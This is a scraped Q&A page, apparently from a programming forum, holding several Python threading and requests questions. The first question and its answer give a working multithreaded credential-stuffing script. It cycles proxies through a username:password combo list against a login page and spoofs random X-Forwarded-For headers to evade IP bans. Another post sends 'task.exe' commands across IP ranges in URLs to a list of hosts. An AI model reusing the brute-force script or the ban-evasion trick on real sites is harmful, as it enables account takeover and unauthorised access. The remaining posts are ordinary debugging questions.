As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
return {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.example.com/'
}
def make_requests():
global user_queue
while True:
uname_pass = user_queue.get().split(':')
status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
if status == 1:
hits.put(uname_pass)
stats['hits'] += 1
if status == 0:
stats['fake'] += 1
if status == -1:
user_queue.put(':'.join(uname_pass))
stats['IP Banned'] += 1
if status == -2:
stats['Exception'] += 1
user_queue.task_done()
def get_status(uname, password):
global proxy_queue
try:
if proxy_queue.empty():
print 'Reloaded proxies, sleeping for 2 mins'
sleep(120)
session = requests.session()
proxy = 'http://' + proxy_queue.get()
login_url = 'http://example.com/login'
header = get_default_header()
header['X-Forwarded-For'] = '8.8.8.8'
login_page = session.get(
login_url,
headers=header,
proxies={
'http':proxy
}
)
tree = html.fromstring(login_page.text)
csrf = list(set(tree.xpath("//input[#name='csrfmiddlewaretoken']/#value")))[0]
payload = {
'email': uname,
'password': password,
'csrfmiddlewaretoken': csrf,
}
result = session.post(
login_url,
data=payload,
headers=header,
proxies={
'http':proxy
}
)
if result.status_code == 200:
if 'access_token' in session.cookies:
return 1
elif 'Please check your email and password.' in result.text:
return 0
else:
# IP banned
return -1
else:
# IP banned
return -1
except Exception as e:
print e
return -2
def populate_proxies():
global proxy_queue
proxy_queue = Queue()
with open('nice_proxy.txt', 'r') as f:
for line in f.readlines():
proxy_queue.put(line.replace('\n', ''))
def hit_printer():
while True:
sleep(5)
print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
global user_queue
global proxy_queue
global stats
global start_time
stats = dict()
stats['hits'] = 0
stats['fake'] = 0
stats['IP Banned'] = 0
stats['Exception'] = 0
threads = 200
hits = Queue()
uname_password_file = '287_uname_pass.txt'
populate_proxies()
user_queue = Queue(threads)
for i in range(threads):
t = Thread(target=make_requests)
t.daemon = True
t.start()
hit_printer = Thread(target=hit_printer)
hit_printer.daemon = True
hit_printer.start()
start_time = time.time()
try:
count = 0
with open(uname_password_file, 'r') as f:
for line in f.readlines():
count += 1
if count > 2000:
break
user_queue.put(line.replace('\n', ''))
user_queue.join()
print '####################Result#####################'
while not hits.empty():
print hits.get()
ttr = round(time.time() - start_time, 3)
print 'Time required: ' + str(ttr)
print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
except Exception as e:
print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned, and it stops working. Since I'm disposing off the proxy after I use it, it shouldn't be the case. So I believe it might be due to one of the following
In an attempt to make multiple requests using multiple sessions, it's somehow failing to maintain disparateness for not supporting asynchronicity.
The victim site bans IPs based on its groups e.g., Banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs
The victim site is using headers like 'X-Forwarded-for', 'Client-IP', 'Via', or a similar header to detect the originating IP. But it seems unlikely because I can log in via by browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure weather I'm making an error in the threading part or the requests part, any help is appreciated.
I have figured out what the problem was, thanks to #Martijn Pieters, as usual, he's a life saver.
I was using elite level proxies and there was no way the victim site could have found my IP address, however, it was using X-Forwarded-For to detect my root IP address.
Since elite level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was using the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address everytime a requests is made which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
Related
I am trying to test aws waf using Python 3. The idea is to send an 500 to 1000 HTTP request in N seconds/minutes and print the status code of each request. the time need to be specified by user, like if user wants to send 1000 request in 5 minutes or wants to send all 1000 request in 1 second.
I am not able to implement timing.
How can I make this work? Below is my code so far:
import requests
import time
import threading
countRequests = 0
countSuccessRequests = 0
countFailedRequests = 0
countAllowRequests = 0
countBlockedRequests = 0
coubtErrors = 0
class Requester(threading.Thread):
def __init__(self, url, w):
threading.Thread.__init__(self)
self.url = url
def run(self):
global countRequests
global countSuccessRequests
global countFailedRequests
global countAllowRequests
global countBlockedRequests
global coubtErrors
try:
r = requests.get(url)
countSuccessRequests+=1
if (r.status_code == 200):
countAllowRequests+=1
print(f"countRequest: {countAllowRequests}, statusCode: {r.status_code}")
if (r.status_code == 403):
countBlockedRequests+=1
print(f"Blocked: {countBlockedRequests}, statusCode: {r.status_code}")
if (r.status_code != 200 and r.status_code != 403):
print(f'Failed: code= {r.status_code}, sample: {w}')
except (requests.Timeout, requests.ConnectionError, requests.HTTPError) as err:
countFailedRequests+=1
if __name__ == '__main__':
url = 'URL-HERE'
print(f"url: {url}")
requ = 150
for w in range(1, requ, +1):
req = Requester(url,w)
req.start()
time.sleep(0)
I tried searching on stack overflow however i was not able to build logic for it.
I would appreciate someone to point me to the correct thread or help me build one.
I am trying to increment the start_ip and end_ip each iteration by 1. Although whenever the function results in the else statement 'already active' the counter keeps going. Is there a way to make number1 pause in the for loop when it hits ip is active? I tried decrementing it by one and adding a break but that does not seem to work.
#!/usr/bin/env python3
import requests
import time
import re
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0','Accept-Encoding': 'gzip, deflate','Upgrade-Insecure-Requests': '1','Accept-Language': 'en-US,en;q=0.5'}
def log(ip):
log = open("ip_active.txt","a+")
log.write(ip)
log.close
def start_ip():
x = 0
while x == 0:
for number1 in range(1,254):
start_ip = '192.168.' + str(number1) + '.1'
end_ip = '192.168.' + str(number1) +'.254'
with open('ip_list.txt', 'r') as iplist:
for ip in iplist:
with open('ip_active.txt', 'r') as ipactive:
try:
if(ip not in ipactive):
log(ip)
print('Running task: ' + ip +f'task.exe%20{start_ip}%20{end_ip}')
target = ip.strip()+f'task.exe%20{start_ip}%20{end_ip}'
r = requests.get(target, allow_redirects=True, verify=False, headers=headers, timeout=1)
else:
#Here number1 keeps incrementing as well but should not.
print(f'ip {ip} already active')
time.sleep(2)
except:
print('Timeout')
continue
def main():
start_ip()
if __name__ == "__main__":
main()
Output:
ip http ://172.16.86.153 already active ip http ://172.16.86.152 already active Running task: http://172.16.86.153/?747fb083889d4d3591b8e185032f958c= task.exe%20192.168.**1**.1%20192.168.**1**.254 Running task: http://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**2**.1%20192.168.**2**.254 ip http ://172.16.86.153 already active ip http ://172.16.86.152 already active
It should continue with:
Running task: http ://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**3**.1%20192.168.**3**.254 Running task: http ://172.16.86.153/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**4**.1%20192.168.**4**.254
but now it results in for example :
Running task: http ://172.16.86.152/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**120**.1%20192.168.**120**.254 Running task: http ://172.16.86.153/?93440f9cf9f743f2b5e4269ec73d4b78= task.exe%20192.168.**121**.1%20192.168.**121**.254
As can be seen when an IP is available it is running the task for example with IP 192.168.12.1 192.168.12.254, for the next IP: 192.168.13.1 192.168.13.254, next ip 192.168.14.1 192.168.14.254 and so on. However when an IP is already active it keeps counting, so it skips those for Running tasks.
I am observing that with python requests module, HTTP keep-alive is not being honored.
I dont see Acks for keep-alive being sent from the host where i am running the python script.
Please let me know how it can be fixed.Following is my code:
import json
import requests
import logging
import sys
import time
from threading import Thread
logging.basicConfig(level=logging.DEBUG)
class NSNitro:
def __init__(self,*args):
if len(args) > 2:
self.ip = args[0]
self.username = args[1]
self.password = args[2]
self.session_id = None
url = 'http://'+self.ip+'/nitro/v1/config/login'
payload = { "login": { "username":"nsroot", "password":"nsroot" }}
headers = {"Content-type": "application/json", 'Connection': 'keep-alive'}
try:
r = requests.post(url=url,headers=headers,data=json.dumps(payload),timeout=5)
logging.info(r.json()["sessionid"])
if(r.json()["sessionid"] != None):
self.session_id = r.json()["sessionid"]
except requests.exceptions.RequestException:
logging.critical("Some error occurred during connection")
else:
logging.error("Not sufficient parameters provided.Required : ipaddress , username , password")
def install_build(self,build_url):
url = 'http://ip/nitro/v1/config/install'
headers = {"Content-type": "application/json","Connection": "keep-alive"}
payload = {"install": {"url": build_url}}
try:
cookie = {"NITRO_AUTH_TOKEN": self.session_id}
r = requests.post(timeout=5, url=url, data=json.dumps(payload), headers=headers,cookies=cookie)
except requests.exceptions.RequestException:
print("Connection Error occurred")
raise '''this will give details of exception'''
else:
assert r.status_code == 201, "Status code seen: " + str(r.status_code) + "\n" + "Error message from system: " + \
r.json()["message"]
print("Successfully triggered job on device to install build")
def __del__(self):
logging.debug("Deleted the object")
if __name__ == '__main__':
ns_session = NSNitro(ip,username,password)
url_i = 'https://myupload-server.net/build-13.0-480.16.tgz'
t1 = Thread(target=ns_session.install_build,args=(url_i,))
t1.start()
''' while t1.is_alive():
t2 = Thread(target=ns_session.get_installed_version,)
t2.start()
t2.join()'''
time.sleep(100)
logging.info("Install thread completed")
t1.join()
ns_session.logout()
When the request is posted using curl command, the acks are sent in specified keep-alive intervals. Without ack being sent , server is resetting the connection.
I have a python program, which will make some api calls and print some output depending upon the api's response. I am using flush = true argument in the print function call. Sometimes the python program looks hung (It won't print anything to the terminal). But when i press CTRL-C, some output is printed to the output and python (looks to)resumes again. I have not written any signal handler for SIGINT. Why is this behavior?
UPDATE (Added python code)
import requests
import config
import json
from ipaddress import IPv4Address, IPv4Network
ip_list = []
filepath = "ip_address_test.txt"
with open(filepath) as fp:
line = fp.readline()
ip_list.append(line.rstrip())
while line:
line = fp.readline()
ip_list.append(line.rstrip())
print(ip_list)
del ip_list[-1]
sysparm_offset = 0
sysparm_limit = 2
flag = 1
for ip in ip_list:
hosts = []
while flag == 1:
print("ip is "+str(ip), flush=True)
# Set the request parameters
url = 'https://xxx.service-now.com/api/now/table/u_cmdb_ci_subnet?sysparm_query=u_lifecycle_status!=end of life^GOTOname>='+ip+'&sysparm_limit='+str(sysparm_limit)+'&sysparm_offset='+str(sysparm_offset)
# Eg. User name="username", Password="password" for this code sample.
user = config.asknow_username
pwd = config.asknow_password
headers = {"Accept":"application/json"}
# Do the HTTP request
response = requests.get(url, auth=(user, pwd), headers=headers,verify=False)
# Check for HTTP codes other than 200
if response.status_code != 200:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:', response.content)
exit()
# Decode the json response into a dictionary and use the data
result = json.loads(response.content)['result']
iter = 0
while iter < sysparm_limit:
print("iter = "+str(iter),flush=True)
print("checking "+result[iter]["name"], flush=True)
id = result[iter]["u_guid"]
url = "https://xxx.service-now.com/api/now/cmdb/instance/u_cmdb_ci_subnet/" + str(id)
response = requests.get(url, auth=(user, pwd), headers=headers,verify=False)
# Check for HTTP codes other than 200
if response.status_code != 200:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:', response.content)
exit()
result1 = json.loads(response.content)['result']
for relation in result1["outbound_relations"]:
if relation["type"]["display_value"] == "IP Connection::IP Connection":
if IPv4Address(relation["target"]["display_value"]) in IPv4Network(ip):
print("appending host", flush=True)
hosts.append(relation["target"]["display_value"])
else:
print("ip not in subnet", flush=True)
flag = 0
break
if flag == 0:
break
iter = iter+1
sysparm_offset = sysparm_offset + 2
with open('output.txt',"a+") as output_file:
for value in hosts:
output_file.write(str(value)+"\n")
print("completed "+ip,flush=True)
flag = 1
I am not sure if my issue is the same since you didn't mention clicking inside the command prompt and you didn't mention if it also resumes when pressing something besides ctrl-c, but it sounds a lot like what I had.
A little more googling led me to an insight I wish I had found as an answer to your question a while ago:
https://www.davici.nl/blog/the-mystery-of-hanging-batch-script-until-keypress
I had no idea a QuickEdit mode existed but besides following the steps in the article, you can also simply open the commandprompt, right-click the title bar, choose "defaults", and then under "Edit Options" disable "QuickEdit Mode".
I hope this helps you (or someone else) as much as it just helped me
I'm building a proxy checker using multithreads, specificly a thread pool from:
from multiprocessing.dummy import Pool as ThreadPool.
The http request is by using urllib2.
What I want to do is for each proxy run 20 requests. If it was 1 threaded it would take too much time. thats where the multithreads power comes to help. So once I set up the proxy I want to run those 20 requests, and manage 2 things. One is to count the exceptions and dump the proxy if too many occurs. 2nd Is to save the average response time and present it later.
I just don't manage to implement the above. But I have implemented it with 1 thread:
import socket
import ssl
import time
import urllib
import urllib2
import httplib
proxyList = []
def loadProxysFromFile(fileName):
global proxyList
with open(fileName) as f:
proxyList = [line.rstrip('\n') for line in f]
def setUrllib2Proxy(proxyAddress):
proxy = urllib2.ProxyHandler({
'http': "http://" + proxyAddress,
'https': "https://" + proxyAddress
})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
def timingRequest(proxy, url):
error = False
setUrllib2Proxy(proxy)
start = time.time()
try:
req = urllib2.Request(url)
urllib2.urlopen(req, timeout=5) #opening the request (getting a response)
except (urllib2.URLError, httplib.BadStatusLine, ssl.SSLError, socket.error) as e:
error = True
end = time.time()
timing = end - start
if error:
print "Error with proxy " + proxy
return 0
else:
print proxy + " Request to " + url + " took: %s" %timing + " seconds."
return timing
# Main
loadProxysFromFile("proxyList.txt")
for proxy in proxyList:
print "Testing: " + proxy
print "\n"
REQUEST_NUM = 20
ERROR_TOLERANCE_NUM = 3
resultList = []
for proxy in proxyList:
avgTime = 0
errorCount = 0
for x in range(0, REQUEST_NUM):
result = timingRequest(proxy, 'https://www.google.com')
if (result == 0):
errorCount += 1
if (errorCount >= ERROR_TOLERANCE_NUM):
break
else:
avgTime += result
if (errorCount < ERROR_TOLERANCE_NUM):
avgTime = avgTime/(REQUEST_NUM-errorCount)
resultList.append(proxy + " has an average response time of: %s" %avgTime)
print '\n'
print "Results Summery: "
print "-----------------"
for res in resultList:
print res
Things that must be done are:
for every proxy: wait until all 20 requests are over before changing proxy. Sync somehow the threads when they adding up to calculate the average response time (includes not to take in account the exceptions)
The best solutions I've read so far is using from multiprocessing.dummy import Pool as ThreadPool and pool.map(func, iterable) but I cant figure out how to implement it in my code.